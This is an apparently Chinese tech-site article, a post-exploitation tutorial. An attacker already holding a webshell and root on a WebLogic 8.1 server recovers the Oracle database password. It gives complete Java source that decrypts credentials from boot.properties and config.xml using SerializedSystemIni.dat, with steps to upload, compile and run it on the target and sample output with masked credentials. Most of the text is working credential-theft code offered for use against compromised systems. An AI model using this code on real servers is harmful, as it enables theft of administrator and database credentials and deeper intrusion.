知识屋:更实用的电脑技术知识网站
知识屋 手机游戏 手机软件 电脑软件 最近更新 手机端
冒险村物语 英雄无敌3塔防 驾考家园手游
password怎么用?p 诺诺视频会议怎 网易UU网游加速
所在位置:首页 > 网络安全 > 安全资讯

weblogic81解密

发布时间:2014-07-15 11:50:28作者:知识屋

0x01 目标环境和已获得的权限
环境:
目标操作系统:linux  
目标web容器:weblogic8.1
目标:oracle
 
已获得的权限:目标系统webshell,root权限
要获取的:目标oracle数据库的连接密码
 
0x02 解密
weblogic8.1采用3DES的。配置文件在 beauser_projectsdomainsmydomain下
启动服务器帐号:boot.properties中; 
数据库连接帐号:config.xml;
 
Weblogic81Utils.java 
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import java.util.regex.Pattern;
import java.util.regex.Matcher;
import java.util.Properties;
import java.util.Iterator;
import java.lang.reflect.Method;
import java.lang.reflect.InvocationTargetException;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.BufferedReader;
import java.io.FileReader;
import java.io.StringWriter;
import java.io.PrintWriter;
import java.io.IOException;
import java.io.InputStream;
import java.net.URLClassLoader;
import java.net.URL;

/**
* Reads information out of the WebLogic domain directory. Needs access to the
* WebLogic JARs in the weblogic81/server/lib directory.
* 
* @version $Rev: 476049 $ $Date: 2006-11-16 23:35:17 -0500 (Thu, 16 Nov 2006) $
*/
public class Weblogic81Utils {
private final static Pattern ENCRYPTED_STRING = Pattern
   .compile(""{S+}S+?"");
private Object decoder;
private Method decode;
private Object decrypter;
private Method decrypt;
private File domainDir;

public Weblogic81Utils(String libDirPath, String domainDirPath) {
  File libDir = new File(libDirPath);
  if (!libDir.exists() || !libDir.canRead() || !libDir.isDirectory())
   throw new IllegalArgumentException("Bad weblogic lib dir");
  File weblogicJar = new File(libDir, "weblogic.jar");
  File securityJar = new File(libDir, "jsafeFIPS.jar");
  if (!weblogicJar.canRead())
   throw new IllegalArgumentException(
     "Cannot find JARs in provided lib dir");
  domainDir = new File(domainDirPath);
  if (!domainDir.exists() || !domainDir.canRead()
    || !domainDir.isDirectory())
   throw new IllegalArgumentException("Bad domain directory");
  File state = new File(domainDir, "SerializedSystemIni.dat");
  if (!state.canRead())
   throw new IllegalArgumentException(
     "Cannot find serialized state in domain directory");
  try {
   ClassLoader loader = new URLClassLoader(
     securityJar.exists() ? new URL[] { weblogicJar.toURL(),
       securityJar.toURL() }
       : new URL[] { weblogicJar.toURL() },
     Weblogic81Utils.class.getClassLoader());
   initialize(loader, state);
  } catch (Exception e) {
   throw (RuntimeException) new IllegalArgumentException(
     "Unable to initialize encryption routines from provided arguments")
     .initCause(e);
  }
}

public Properties getBootProperties() {
  File boot = new File(domainDir, "boot.properties");
  FileInputStream bootIn = null;
  try {
   bootIn = new FileInputStream(boot);
  } catch (FileNotFoundException e) {
   return null;
  }
  try {
   Properties props = new Properties();
   props.load(bootIn);
   bootIn.close();
   for (Iterator it = props.keySet().iterator(); it.hasNext();) {
    String key = (String) it.next();
    String value = props.getProperty(key);
    if (value != null && value.startsWith("{"))
     props.setProperty(key, decryptString(value));
   }
   return props;
  } catch (Exception e) {
   return null;
  }
}

public String getConfigXML() throws FileNotFoundException {
  File config = new File(domainDir, "config.xml");
  BufferedReader in = new BufferedReader(new FileReader(config));
  StringWriter string = new StringWriter();
  PrintWriter out = new PrintWriter(string);
  String line;
  Matcher m = ENCRYPTED_STRING.matcher("");
  try {
   while ((line = in.readLine()) != null) {
    m.reset(line);
    int last = -1;
    while (m.find()) {
     out.print(line.substring(last + 1, m.start()));
     String s = line.substring(m.start(), m.end());
     out.print(""");
     out.print(decryptString(s.substring(1, s.length() - 1)));
     out.print(""");
     last = m.end() - 1;
    }
    if (last == -1) {
     out.println(line);
    } else {
     if (line.length() > last + 1) {
      out.print(line.substring(last + 1));
     }
     out.println();
    }
    out.flush();
   }
   in.close();
   out.close();
  } catch (Exception e) {
   return null;
  }
  return string.getBuffer().toString();
}

private void initialize(ClassLoader loader, File state) throws IOException,
   IllegalAccessException, NoSuchMethodException,
   InvocationTargetException, ClassNotFoundException,
   InstantiationException {
  byte[] salt = null, key = null;
  FileInputStream in = new FileInputStream(state);
  salt = readBytes(in);
  int i = in.read();
  if (i != -1) {
   if (i != 1)
    throw new IllegalStateException();
   key = readBytes(in);
  }
  in.close();
  decrypter = getEncryptionService(loader, salt, key);
  decoder = loader.loadClass("weblogic.utils.encoders.BASE64Decoder")
    .newInstance();
  decode = decoder.getClass().getMethod("decodeBuffer",
    new Class[] { String.class });
  decrypt = decrypter.getClass().getMethod("decryptString",
    new Class[] { byte[].class });
}

private static byte[] readBytes(InputStream in) throws IOException {
  int len = in.read();
  if (len < 0)
   throw new IOException("stream is empty");
  byte result[] = new byte[len];
  int index = 0;
  while (true) {
   if (index >= len) {
    break;
   }
   int count = in.read(result, index, len - index);
   if (count == -1)
    break;
   index += count;
  }
  return result;
}

public String decryptString(String string) throws IllegalAccessException,
   InvocationTargetException {
  if (string.indexOf('}') > -1) {
   string = string.substring(string.indexOf("}") + 1);
  }
  return (String) decrypt
    .invoke(decrypter, new Object[] { decode.invoke(decoder,
      new Object[] { string }) });
}

static Object getEncryptionService(ClassLoader loader, byte salt[],
   byte key[]) throws NoSuchMethodException, ClassNotFoundException,
   IllegalAccessException, InvocationTargetException {
  String magic = "0xccb97558940b82637c8bec3c770f86fa3a391a56";
  Object factory = loader
    .loadClass(
      "weblogic.security.internal.encryption.JSafeEncryptionServiceImpl")
    .getMethod("getFactory", new Class[0]).invoke(null, null);
  Method getter = factory.getClass().getMethod("getEncryptionService",
    new Class[] { byte[].class, String.class, byte[].class });
  return getter.invoke(factory, new Object[] { salt, magic, key });
}
}

Main.java

import java.util.*;
import java.io.*;

public class Main {

public static void main(String args[]) {
  try {
   String beaDir = "//opt//bea//weblogic81//server/lib";// args[0];
   String appDir = "/opt//bea//user_projects//domains//mydomain";// args[1];
   String hashedPassword = null;
   if (args.length >= 3) {
    hashedPassword = args[2];
   }

   Weblogic81Utils weblogic81Utils = new Weblogic81Utils(beaDir,
     appDir);
   String configXML = weblogic81Utils.getConfigXML();
   Properties bootProperties = (Properties) weblogic81Utils
     .getBootProperties();
   System.out
     .println("---------------------------------------------------------------------");
   System.out.println("boot.properties" + " <username> "
     + bootProperties.getProperty("username"));
   System.out.println("boot.properties" + " <password> "
     + bootProperties.getProperty("password"));

   if (hashedPassword != null) {
    String plainTextPassword = weblogic81Utils
      .decryptString(hashedPassword);
    System.out.println(hashedPassword + " == " + plainTextPassword);
   }
   System.out
     .println("---------------------------------------------------------------------");
  } catch (Exception e) {
   throw (RuntimeException) new IllegalArgumentException(
     "Unable to initialize encryption routines from provided ar guments")
     .initCause(e);
  }
} // end of main

}

 

 
 
 
Main.java中只需要改成你自己目标机器上的路径即可。
 
0x03 编译执行
把上面的文件传到目标服务器上
第一步:   执行javac Weblogic81Utils.java
              会生成一个相应的  Weblogic81Utils.class文件
第二步:   执行javac Main.java -classpath 路径
               这个路径填Weblogic81Utils.class所在的目录
第三步:执行  java Main 即可得到解密文件
            
  
[/opt/bea/user_projects/domains/mydomain/]$ java Main
---------------------------------------------------------------------
boot.properties <username> Qxxxxxx
boot.properties <password> Txxxxxx
--------------------------------------------------------------------

 

 
 
将config.xml中的密文替换到boot.properties中即可解密config.xml的密文。
 
(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏

上一篇:职业黑客插U盘种木马,U盘防范常识

下一篇:Defcon Shitsco程序分析–信息泄露

知识阅读

软件推荐

更多 >

游戏推荐

更多 >

精选栏目

热门推荐

  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜

手机游戏

手机软件

电脑软件

猜你喜欢

旅游 动作 三国 趣味 节奏 学习 RPG 仙侠 医疗 漫画 塔防 钱包 购物 生活 联机 角色扮演 换装 教育 系统软件 拍照 摄影 3D 二次元 策略 财经 招聘 铃声 通讯 吃鸡 武侠 手机美化 WIFI 分期 办公 美食 魔幻 唱歌 挂机 投注 社交 个人借贷 街机 射击 视频 系统 腾讯 恋爱 剧情 抢红包 宫斗

本站所有软件来自互联网,版权归原著所有。如有侵权,敬请来信告知,我们将及时撤销。

知识屋 www.zhishiwu.com 更实用的电脑技术知识网站

苏ICP备14019037号-7